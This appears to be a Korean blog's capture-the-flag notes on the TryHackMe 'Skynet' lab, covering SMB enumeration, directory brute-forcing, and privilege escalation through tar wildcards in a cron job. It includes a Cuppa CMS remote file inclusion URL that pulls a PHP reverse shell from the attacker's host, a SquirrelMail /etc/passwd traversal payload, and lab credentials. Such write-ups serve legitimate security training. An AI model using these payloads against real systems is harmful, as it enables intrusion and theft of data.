OSCP/TryHackMe

[Linux] Skynet

우와해커 2020. 4. 23. 17:03


Skynet

 

A vulnerable Terminator themed Linux machine.

  • Scan ports using nmap
  • Use GoBuster to enumerate directories
  • Experiment with SMBMap to find Samba shares
  • Using enumerated credentials to read emails
  • Exploit CMS RFI vulnerability
  • Exploit tar wildcards for privilege escalation

 

 

Flow정리

1. Enumeration (samba)
- nmap,smbmap,enum4linux 사용
2. 정보 획득 및 다운로드
- smbclient, rpcclient, smbget 사용
3. 히든 디렉토리
- gobuster
4. CMS 버전, exploit 검색
5. LFI, RFI
- RFI를 통한 리버스 웹쉘 실행
6. 권한 상승
- cron 작업 + tar 와일드카드 취약점 이용

 

 

 

 

SAMBA(리눅스가 SMB를 이용하여 windows시스템과 파일공유 도와주는 툴)

 

smbmap(Enumation tool)
smbmap -H [ip]

 

smbclient
열거: smbclient -L //10.10.7.56
접속(익명): smbclient //[ip]/anonymous
계정접속: smbclient //[ip]/milesdyson -U 'milesdyson'

다운로드: smbget: smb://[ip]/anonymous/[folder or file]

(smbget 사용시 smb프로토콜을 붙여주는것이 중요 포인트!)

 

rpcclient -U '' [ip]
$> enumdomusers

 

milesdyson
cyborg007haloterminator

 

 

cuppa (RFI&LFI를 통한 웹쉘 reverse RCE 하나 있음)
/cuppa/alerts/alertConfigField.php?urlConfig=http://10.11.3.30/phpshell.php
(http 프로토콜 붙여줘야함..)

 

 

cronjob 이용 권한 상승
1. 시스템 작업 리스트: /etc/crontab
2. 사용자 작업 리스트: crontab -l

3. APP 크론 작업 리스트: /etc/cron.d/*

 

 

tar의 와일드카드(*)를 이용한 권한 상승 취약점
https://www.helpnetsecurity.com/2014/06/27/exploiting-wildcards-on-linux/

 

 

 

 

OPENSSL 1.1.1 업그레이드
https://askubuntu.com/questions/1102803/how-to-upgrade-openssl-1-1-0-to-1-1-1-in-ubuntu-18-04

 

 

skynet 롸잇업
https://blog.tryhackme.com/skynet-writeup/

 

 

squirrelmail 1.4.3 (RCE와 file inclusion이 있음)
[squirrelmail dir] /src/redirect.php?plugins[]=../../../../etc/passwd%00
=>include안됨, Fake임 어쨋든 이런게 있었다 정도로 넘어가자

'OSCP > TryHackMe' 카테고리의 다른 글

Hacking with Powershell  (0) 2020.05.06
[Linux] Daily Bugle  (0) 2020.04.25
[Linux] Game Zone  (0) 2020.04.22
[Windows] HackPark  (0) 2020.04.20
[Windows] Alfred  (0) 2020.04.16